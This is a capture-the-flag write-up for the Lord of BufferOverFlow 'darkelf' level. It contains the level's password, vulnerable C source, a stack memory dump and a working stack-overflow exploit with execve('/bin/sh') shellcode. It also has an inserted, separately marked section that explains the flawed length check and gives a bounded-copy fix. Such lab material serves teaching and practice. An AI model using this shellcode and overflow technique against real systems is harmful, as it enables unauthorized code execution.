[Lord Of BufferOverFlow] Level 6: wolfman -> darkelf

2021. 2. 25. 17:55·Write-Up/LOB(lord of bufferoverflow)

login : wolfman

password : love eyuna

 

 

/*
        The Lord of the BOF : The Fellowship of the BOF
        - darkelf
        - egghunter + buffer hunter + check length of argv[1]
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);
}

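This is the same as the previous level, except that a check on the length of the argument has been added.

Since I didn't enter 48 or more in the previous level, I think I can just solve it the same way.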
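Why the added length check does not protect the buffer, as an added example that is not part of the original post: the check admits 48 bytes while `buffer` holds 40, and a copy bounded by the destination size is the fix. The function names and the 44-byte offset of the saved return address (40-byte buffer plus 4-byte saved EBP, consistent with the 44 bytes that precede the address in the post's payload) are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE   40  /* char buffer[40] in darkelf.c */
#define LEN_LIMIT  48  /* strlen(argv[1]) > 48 is rejected by the challenge */
#define RET_OFFSET 44  /* assumed: 40-byte buffer + 4-byte saved EBP (i386) */

enum reach { FITS, HITS_SAVED_EBP, HITS_RETURN_ADDR };

/* Mirrors the challenge's length check: 1 if the argument is accepted. */
int challenge_accepts(const char *arg) {
    return strlen(arg) <= LEN_LIMIT;
}

/* What strcpy(buffer, arg) would write over, counting the trailing NUL. */
enum reach copy_reach(const char *arg) {
    size_t written = strlen(arg) + 1;
    if (written <= BUF_SIZE) return FITS;
    if (written <= RET_OFFSET) return HITS_SAVED_EBP;
    return HITS_RETURN_ADDR;
}

/* Hardened copy: bound by the destination size and reject, never truncate. */
int bounded_copy(char *dst, size_t dst_size, const char *src) {
    size_t n = strlen(src);
    if (n >= dst_size) return -1;   /* no room for the data plus its NUL */
    memcpy(dst, src, n + 1);
    return 0;
}

int main(void) {
    char arg[LEN_LIMIT + 1], buffer[BUF_SIZE];
    memset(arg, 'a', LEN_LIMIT);    /* constructed 48-byte input */
    arg[LEN_LIMIT] = '\0';
    printf("accepted by challenge check: %d\n", challenge_accepts(arg));
    printf("reach of strcpy: %d\n", copy_reach(arg));
    printf("bounded_copy result: %d\n", bounded_copy(buffer, sizeof buffer, arg));
    return 0;
}
```

The limit has to be derived from `sizeof(buffer)`, not from a constant chosen independently of the destination.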

0xbffffbe8:     0x0000000e      0x000001f9      0x00000010      0x0f8bfbff
0xbffffbf8:     0x0000000f      0xbffffc29      0x00000000      0x00000000
0xbffffc08:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffc18:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffc28:     0x38366900      0x682f0036      0x2f656d6f      0x666c6f77
0xbffffc38:     0x2f6e616d      0x706d6574      0x61616100      0x61616161
0xbffffc48:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffc58:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffc68:     0x61616161      0xbfbfbf61      0x454c00bf      0x504f5353

I'll take 0xbffffc50.

./darkelf `python -c print'"\x90"*19 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" + "\x50\xfc\xff\xbf"'`

 

kernel crashed
